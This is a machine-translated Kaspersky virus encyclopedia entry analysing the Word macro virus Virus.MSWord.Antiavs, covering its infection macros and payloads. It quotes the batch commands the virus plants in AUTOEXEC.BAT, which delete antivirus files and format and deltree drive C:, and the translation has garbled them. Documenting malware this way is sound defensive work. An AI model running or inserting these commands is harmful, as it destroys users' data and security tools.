CE SERVICE PEUT CONTENIR DES TRADUCTIONS GÉNÉRÉES PAR GOOGLE. GOOGLE DÉCLINE TOUTE GARANTIE, EXPLICITE OU IMPLICITE, Y COMPRIS LES GARANTIES D'EXACTITUDE, DE FIABILITÉ, AINSI QUE TOUTE GARANTIE IMPLICITE DE COMMERCIALISATION ET D'ADAPTATION À DES FINS PARTICULIÈRES ET À L'ABSENCE DE CONTREFAÇONS.

Le site internet de Kaspersky Lab a été traduit pour votre commodité en utilisant un logiciel de traduction générée par Google. Des efforts raisonnables ont été faits pour fournir une traduction exacte. Cependant, aucune traduction automatique n'est parfaite et l'objectif n'est pas de remplacer le travail des traducteurs. Le site internet de Kaspersky Lab fournit ces traductions comme un service pour ses utilisateurs, et elles ont été publiées "telles quelles". Aucune garantie, explicite ou implicite, n'est faite au sujet de l'exactitude, de fiabilité ou de conformité de ces traductions faites de l'anglais vers une autre langue. Certains contenus (images, vidéos, Flash, etc.) peuvent ne pas être traduits correctement à cause des limites du logiciel de traduction.

Virus.MSWord.Antiavs

Classe Virus
Plateforme MSWord
Description

Détails techniques

Ceci est un virus de macro Word chinois crypté. Il contient neuf macros: AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro, Organisateur.

Le virus infecte la zone globale des macros lors de l'ouverture d'un document infecté (AutoOpen) et écrit lui-même dans les documents enregistrés avec un nouveau nom (FileSaveAs).

En entrant dans le menu Fichier / Modèle (FileTemplate), le virus définit le mot de passe "AntiAVs" pour le document en cours et affiche le MessageBox:


WordBasic Err = 16
Pas assez de mémoire!
En entrant dans le menu Outils / Macro (OutilsMacro) le virus efface tous les textes dans le document courant et ajoute au fichier AUTOEXEC.BAT les commandes qui effacent les fichiers PC-CILLIN antivirus:

Écho off
attrib -h -r -s + ac: pc-cil ~ 1 *. *> nul
del c: pc-cil ~ 1 * .dll> nul
Le virus efface ensuite les fichiers antivirus:

C: PC-Cillin 95Lpt $ vpn. *
C: PC-Cillin 97Lpt $ vpn. *
C: TscPC-Cillin 97Lpt $ vpn. *
C: ZlockavGsav.cas
C: VB7Virus.txt
C: Program FilesNorton AntiVirusViruscan.dat
C: Program FilesSymantecSymevnt.386
C: Program FilesMcAfeeVirusScan95Scan.dat
C: Programme FilesMcAfeeVirusScan95Mcscan32.dll
C: Program FilesMcAfeeVirusScanScan.dat
C: programme FilesMcAfeeVirusScanMcscan32.dll
C: Program FilesCommand LogicielF-PROT95Sign.def
C: Program FilesCommand LogicielF-PROT95Dvp.vxd
C: Program FilesAntiViral Toolkit ProAvp32.exe
C: Program FilesAntiViral Toolkit Pro * .avc
C: Tbavw95Tbavw95.vxd
En fonction du compteur aléatoire du système, le virus écrit le texte dans le fichier AUTOEXEC.BAT:

@Écho off
cls
echo j'ai nettoyé un énorme virus:
echo MS-WINDOWS
écho pour vous. ^ _ ^
echo –AntiAVs–
écho y | format c: / u / v: AAV> nul
deltree / yc:> nul


Lien vers l'original